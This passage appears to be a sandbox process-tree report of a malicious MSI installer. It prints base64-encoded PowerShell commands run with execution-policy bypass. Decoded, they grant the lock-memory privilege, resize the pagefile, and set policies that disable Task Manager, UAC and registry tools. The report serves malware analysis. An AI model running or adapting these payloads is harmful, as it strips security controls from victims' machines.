AAoAIAAgACAAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAFMAZQByAHYAZQByAFMAdAByAGkAbgBnADsACgAgACAAIAAgAFAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABTAGUAcgB2AGUAcgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAWgBlAHIAbwBNAGUAbQBvAHIAeQAoACYATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAcwBpAHoAZQBvAGYAKABPAGIAagBlAGMAdABBAHQAdAByAGkAYgB1AHQAZQBzACkAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAUwBlAHIAdgBlAHIATgBhAG0AZQAgACEAPQAgAE4AVQBMAEwAKQAgAHsACgAgACAAIAAgACAAIAAgACAASQBuAGkAdABMAHMAYQBTAHQAcgBpAG4AZwAoACYAUwBlAHIAdgBlAHIAUwB0AHIAaQBuAGcALAAgAFMAZQByAHYAZQByAE4AYQBtAGUAKQA7AAoAIAAgACAAIAAgACAAIAAgAFMAZQByAHYAZQByACAAPQAgACYAUwBlAHIAdgBlAHIAUwB0AHIAaQBuAGcAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgAEwAcwBhAE8AcABlAG4AUABvAGwAaQBjAHkAKAAKACAAIAAgACAAIAAgACAAIABTAGUAcgB2AGUAcgAsAAoAIAAgACAAIAAgACAAIAAgACYATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAAoAIAAgACAAIAAgACAAIAAgAEQAZQBzAGkAcgBlAGQAQQBjAGMAZQBzAHMALAAKACAAIAAgACAAIAAgACAAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAKACAAIAAgACAAKQA7AAoAfQAKAAoATgBUAFMAVABBAFQAVQBTACAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAKABMAFMAQQBfAEgAQQBOAEQATABFACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUALAAgAFAAUwBJAEQAIABBAGMAYwBvAHUAbgB0AFMAaQBkACwAIABMAFAAVwBTAFQAUgAgAFAAcgBpAHYAaQBsAGUAZwBlAE4AYQBtAGUALAAgAEIATwBPAEwAIABiAEUAbgBhAGIAbABlACkACgB7AAoAIAAgACAAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnADsACgAKACAAIAAgACAASQBuAGkAdABMAHMAYQBTAHQAcgBpAG4AZwAoACYAUAByAGkAdgBpAGwAZQBnAGUAUwB0AHIAaQBuAGcALAAgAFAAcgBpAHYAaQBsAGUAZwBlAE4AYQBtAGUAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAYgBFAG4AYQBiAGwAZQApACAAewAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAEwAcwBhAEEAZABkAEEAYwBjAG8AdQBuAHQAUgBpAGcAaAB0AHMAKAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFAAbwBsAGkAYwB5AEgAYQBuAGQAbABlACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABBAGMAYwBvAHUAbgB0AFMAaQBkACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAmAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAxAAoAIAAgACAAIAAgACAAIAAgACkAOwAKACAAIAAgACAAfQAKACAAIAAgACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIABMAHMAYQBSAGUAbQBvAHYAZQBBAGMAYwBvAHUAbgB0AFIAaQBnAGgAdABzACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBjAGMAbwB1AG4AdABTAGkAZAAsAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARgBBAEwAUwBFACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAmAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAxAAoAIAAgACAAIAAgACAAIAAgACkAOwAKACAAIAAgACAAfQAKAH0ACgAKAHYAbwBpAGQAIABtAGEAaQBuACgAKQAKAHsACgAgACAAIAAgAEgAQQBOAEQATABFACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACgARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAsACAAVABPAEsARQBOAF8AUQBVAEUAUgBZACwAIAAmAGgAVABvAGsAZQBuACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACAAZgBhAGkAbABlAGQALgAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACAAcgBlAHQAdQByAG4AZQBkADoAIAAlAGQAXABuACIALAAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQApADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAtADEAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABEAFcATwBSAEQAIABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQAgAD0AIAAwADsACgAKACAAIAAgACAAaQBmACAAKAAhAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AKABoAFQAbwBrAGUAbgAsACAAVABvAGsAZQBuAFUAcwBlAHIALAAgAE4AVQBMAEwALAAgADAALAAgACYAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQAgACYAJgAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQAgACEAPQAgAEUAUgBSAE8AUgBfAEkATgBTAFUARgBGAEkAQwBJAEUATgBUAF8AQgBVAEYARgBFAFIAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAFAAVABPAEsARQBOAF8AVQBTAEUAUgAgAHAAVABvAGsAZQBuAFUAcwBlAHIAIAA9ACAAKABQAFQATwBLAEUATgBfAFUAUwBFAFIAKQAgAG0AYQBsAGwAbwBjACgAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBHAGUAdABUAG8AawBlAG4ASQBuAGYAbwByAG0AYQB0AGkAbwBuACgACgAgACAAIAAgACAAIAAgACAAaABUAG8AawBlAG4ALAAKACAAIAAgACAAIAAgACAAIABUAG8AawBlAG4AVQBzAGUAcgAsAAoAIAAgACAAIAAgACAAIAAgAHAAVABvAGsAZQBuAFUAcwBlAHIALAAKACAAIAAgACAAIAAgACAAIABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQAsAAoAIAAgACAAIAAgACAAIAAgACYAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAEwAUABXAFMAVABSACAAcwB0AHIAcwBpAGQAOwAKACAAIAAgACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAKABwAFQAbwBrAGUAbgBVAHMAZQByAC0APgBVAHMAZQByAC4AUwBpAGQALAAgACYAcwB0AHIAcwBpAGQAKQA7AAoAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBVAHMAZQByACAAUwBJAEQAOgAgACUAUwBcAG4AIgAsACAAcwB0AHIAcwBpAGQAKQA7AAoACgAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAE4AVABTAFQAQQBUAFUAUwAgAHMAdABhAHQAdQBzADsACgAgACAAIAAgAEwAUwBBAF8ASABBAE4ARABMAEUAIABwAG8AbABpAGMAeQBIAGEAbgBkAGwAZQA7AAoACgAgACAAIAAgAGkAZgAgACgAcwB0AGEAdAB1AHMAIAA9ACAATwBwAGUAbgBQAG8AbABpAGMAeQAoAE4AVQBMAEwALAAgAFAATwBMAEkAQwBZAF8AQwBSAEUAQQBUAEUAXwBBAEMAQwBPAFUATgBUACAAfAAgAFAATwBMAEkAQwBZAF8ATABPAE8ASwBVAFAAXwBOAEEATQBFAFMALAAgACYAcABvAGwAaQBjAHkASABhAG4AZABsAGUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUABvAGwAaQBjAHkAIAAlAGQAIgAsACAAcwB0AGEAdAB1AHMAKQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAGkAZgAgACgAcwB0AGEAdAB1AHMAIAA9ACAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAKABwAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsACAAcABUAG8AawBlAG4AVQBzAGUAcgAtAD4AVQBzAGUAcgAuAFMAaQBkACwAIABTAEUAXwBMAE8AQwBLAF8ATQBFAE0ATwBSAFkAXwBOAEEATQBFACwAIABUAFIAVQBFACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBPAHAAZQBuAFAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAbwBsAGkAYwB5ACAAJQBkACIALAAgAHMAdABhAHQAdQBzACkAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAgACAAIAAgAFQATwBLAEUATgBfAFAAUgBJAFYASQBMAEUARwBFAFMAIAB0AHAAOwAKAAoAIAAgACAAIABpAGYAIAAoACEATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAoAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALAAgAFQATwBLAEUATgBfAFEAVQBFAFIAWQAgAHwAIABUAE8ASwBFAE4AXwBBAEQASgBVAFMAVABfAFAAUgBJAFYASQBMAEUARwBFAFMALAAgACYAaABUAG8AawBlAG4AKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUAByAG8AYwBlAHMAcwBUAG8AawBlAG4AIAAjADIAIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAEMAbwB1AG4AdAAgAD0AIAAxADsACgAgACAAIAAgAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAHMAWwAwAF0ALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgAFMARQBfAFAAUgBJAFYASQBMAEUARwBFAF8ARQBOAEEAQgBMAEUARAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBWAGEAbAB1AGUAKABOAFUATABMACwAIABTAEUAXwBMAE8AQwBLAF8ATQBFAE0ATwBSAFkAXwBOAEEATQBFACwAIAAmAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAHMAWwAwAF0ALgBMAHUAaQBkACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBWAGEAbAB1AGUAIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAEIATwBPAEwAIAByAGUAcwB1AGwAdAAgAD0AIABBAGQAagB1AHMAdABUAG8AawBlAG4AUAByAGkAdgBpAGwAZQBnAGUAcwAoAGgAVABvAGsAZQBuACwAIABGAEEATABTAEUALAAgACYAdABwACwAIAAwACwAIAAoAFAAVABPAEsARQBOAF8AUABSAEkAVgBJAEwARQBHAEUAUwApAE4AVQBMAEwALAAgADAAKQA7AAoAIAAgACAAIABEAFcATwBSAEQAIABlAHIAcgBvAHIAIAA9ACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApADsACgAKACAAIAAgACAAaQBmACAAKAAhAHIAZQBzAHUAbAB0ACAAfAB8ACAAKABlAHIAcgBvAHIAIAAhAD0AIABFAFIAUgBPAFIAXwBTAFUAQwBDAEUAUwBTACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBBAGQAagB1AHMAdABUAG8AawBlAG4AUAByAGkAdgBpAGwAZQBnAGUAcwAgAGYAYQBpAGwAZQBkAC4AIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAHIAZQB0AHUAcgBuAGUAZAA6ACAAJQBkAFwAbgAiACwAIABlAHIAcgBvAHIAKQA7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAALQAxADsACgAgACAAIAAgAH0ACgAKACAAIAAgACAAQwBsAG8AcwBlAEgAYQBuAGQAbABlACgAaABUAG8AawBlAG4AKQA7AAoAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAUwBJAFoARQBfAFQAIABwAGEAZwBlAFMAaQB6AGUAIAA9ACAARwBlAHQATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAoACkAOwAKAAoAIAAgACAAIABjAGgAYQByACAAKgBsAGEAcgBnAGUAQgB1AGYAZgBlAHIAIAA9ACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABOAFUATABMACwAIABwAGEAZwBlAFMAaQB6AGUAIAAqACAATgBfAFAAQQBHAEUAUwBfAFQATwBfAEEATABMAE8AQwAsACAATQBFAE0AXwBSAEUAUwBFAFIAVgBFACAAfAAgAE0ARQBNAF8AQwBPAE0ATQBJAFQAIAB8ACAATQBFAE0AXwBMAEEAUgBHAEUAXwBQAEEARwBFAFMALAAgAFAAQQBHAEUAXwBSAEUAQQBEAFcAUgBJAFQARQApADsACgAgACAAIAAgAGkAZgAgACgAbABhAHIAZwBlAEIAdQBmAGYAZQByACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAYQBwAHAAbABvAGcAKABMAE8ARwBfAEkATgBGAE8ALAAgACIAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAIABmAGEAaQBsAGUAZAAsACAAZQByAHIAbwByACAAMAB4ACUAeAAiACwAIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAoACkAKQA7AAoAIAAgACAAIAB9AAoAfQA=
      4⤵
      PID:2152
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6C06.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6BF3.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6C04.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6C05.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2640
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgAkAHAAYQBnAGUAZgBpAGwAZQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtACAALQBFAG4AYQBiAGwAZQBBAGwAbABQAHIAaQB2AGkAbABlAGcAZQBzAAoAJABwAGEAZwBlAGYAaQBsAGUALgBBAHUAdABvAG0AYQB0AGkAYwBNAGEAbgBhAGcAZQBkAFAAYQBnAGUAZgBpAGwAZQAgAD0AIAAkAGYAYQBsAHMAZQAKACQAcABhAGcAZQBmAGkAbABlAC4AcAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADIAMAA0ADgAMAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
      4⤵
      PID:2072
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7676.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7673.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7674.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7675.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2488
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAEwAVQBBACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwAiACAALQBOAGEAbQBlACAAIgBTAHkAcwB0AGUAbQAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdA